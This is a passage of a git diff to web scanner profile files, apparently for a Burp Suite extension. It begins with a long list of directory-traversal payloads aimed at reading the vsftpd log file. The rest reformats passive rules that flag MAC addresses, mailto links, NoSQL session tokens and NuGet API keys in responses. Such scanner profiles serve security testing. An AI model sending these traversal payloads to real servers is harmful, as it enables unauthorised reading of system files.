+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,CONNECT:"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-vsftpd-log",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-vsftpd-log listed",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "var/log/vsftpd.log",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/MAC_Address.bb b/profiles/MAC_Address.bb
old mode 100644
new mode 100755
index 650f5c5..aa767fd
--- a/profiles/MAC_Address.bb
+++ b/profiles/MAC_Address.bb
@@ -1 +1,60 @@
-[{"Name":"MAC_Address","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})","true,Or,[^a-zA-Z0-9]([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"MAC Address","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "MAC_Address",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,^([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})",
+ "true,Or,[^a-zA-Z0-9]([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "MAC Address",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Mailto.bb b/profiles/Mailto.bb
old mode 100644
new mode 100755
index ec39786..765599b
--- a/profiles/Mailto.bb
+++ b/profiles/Mailto.bb
@@ -1 +1,59 @@
-[{"Name":"Mailto","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?\u003c\u003dmailto:)[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9.-]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Mailto","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Mailto",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?\u003c\u003dmailto:)[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9.-]+"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Mailto",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/NoSQL_Session_Token.bb b/profiles/NoSQL_Session_Token.bb
old mode 100644
new mode 100755
index 61c1fd8..832f91e
--- a/profiles/NoSQL_Session_Token.bb
+++ b/profiles/NoSQL_Session_Token.bb
@@ -1 +1,59 @@
-[{"Name":"NoSQL_Session_Token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,_SessionToken"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"NoSQL Session Token","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "NoSQL_Session_Token",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,_SessionToken"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "NoSQL Session Token",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/NuGet_Api_Key.bb b/profiles/NuGet_Api_Key.bb
old mode 100644
new mode 100755
index 615f7f9..0b88f26
--- a/profiles/NuGet_Api_Key.bb
+++ b/profiles/NuGet_Api_Key.bb
@@ -1 +1,59 @@
-[{"Name":"NuGet_Api_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,X-NuGet-ApiKey"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"NuGet Api Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "NuGet_Api_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,X-NuGet-ApiKey"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "NuGet Api Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/OAuth2.bb b/profiles/OAuth2.bb
old mode 100644
new mode 100755
index 77c42be..57618a1
--- a/profiles/OAuth2.bb
+++ b/profiles/OAuth2.bb
@@ -1 +1,65 @@
